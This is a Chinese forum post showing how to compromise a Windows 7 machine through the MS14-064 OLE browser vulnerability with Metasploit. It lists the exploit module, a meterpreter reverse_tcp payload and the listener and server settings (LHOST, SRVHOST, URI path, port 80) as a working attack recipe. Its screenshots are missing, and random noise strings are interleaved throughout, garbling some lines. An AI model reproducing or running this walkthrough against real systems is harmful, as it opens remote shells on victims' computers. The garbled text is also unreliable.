找回密码
 立即注册
查看: 1766|回复: 0
打印 上一主题 下一主题

MS14-064 漏洞测试入侵win7

[复制链接]
跳转到指定楼层
楼主
发表于 2018-10-20 20:20:35 | 只看该作者 回帖奖励 |正序浏览 |阅读模式

- i0 x7 r* U+ ~/ C9 {, t- o 我发现msf下的exp只能针对带有powershell的机器进行攻击,我们用如下方法来搞演示 7 Y+ J1 A7 {, a- B9 r

8 q, S% C! I% z& y+ n! p: t; E0 O

. h2 Q& F9 k, d0 a3 @/ b 开启msf执行命令use exploits/windows/browser/ms14_064_ole_code_execution如图: ! |8 F4 I- A3 l6 L6 l2 p/ M

% e/ V0 ~& I- h2 u4 v

1 w6 S2 O' u( }9 S 然后执行命令 set PAYLOAD windows/meterpreter/reverse_tcp 6 ~. i/ G% ^( ]5 I1 b7 \

# D5 _0 \. l+ N

' h/ X3 O2 j2 }! e8 I$ ?             set AllowPowershellPrompt true / t( ~% p/ I3 Q# {3 v: }) I0 k

3 j) Z- t# R/ z2 L5 h' M4 H

F1 l8 P% Z6 ]/ ~+ L! x             Set LHOST 192.168.0.1097 X- J& \* i/ B6 J# Q' Q. W2 g" ?

& W5 X5 s; R/ @' f" ~3 O7 l

$ n ]1 ]( z, [3 G7 D ]             set SRVHOST 192.168.0.109 4 _7 H" X7 P% S; d( [* c

, n# z$ A% u C

5 g% x* I1 T4 T& I+ G- _             Set uripath share8 M, o6 x1 `3 F. ~( H% i7 g- {

9 S' z7 r/ o# }2 B

5 @( h3 s; W1 Y# ]- b             Set srvport 80 ) N( z, m% ?6 U& H; N$ F1 o0 V

g+ Y$ H7 ^3 K$ u$ [1 H' Q

& A$ k* X7 C) `7 \, f3 ]   @( a5 j. Y0 x6 H

& S, `; ?2 ^* P( D" o6 q4 V

; z% o5 A; f2 M/ ~! Z ?   + a8 {# X* b; Y, r& t1 o8 M0 K

- g/ [! E5 h# m+ Z7 \- r8 x1 I

; ?3 b k# k- `: ]9 Z  & t& c* q- ]( h

$ s7 e) Z: _9 i, L, W* U; e

% q; y. J; @; ~, o0 s& e5 w% U   ! f& F T" B7 S) [& ~4 C) }. H

2 Z/ Z" [( R; {5 P+ d* _4 X

2 T0 h2 C# V5 s0 O7 D) _) f   ; p# q+ c7 E& {7 ]

! M+ G* t: G, b+ r2 ]

& j. H* X0 ?7 t8 h 下面我们来访问本地地址如图:( P$ s, r0 m- X* p5 \2 V/ E9 E9 J

$ }7 V; A9 l% W) Q! \# a

9 x/ w8 x: I1 {* r- `$ k+ P7 U) U  2 @9 t2 I; p$ Y* `; O

- |! V8 U6 n$ _0 g$ ]$ l9 g4 W

8 m, j! s p! ^5 V- T. d   + U- P/ R. E1 y

- {) W/ w0 M6 b

) a* O* `* t6 D! c4 A* |* V' R7 ~ 8 g" G% k5 v8 L! h+ J, @

回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表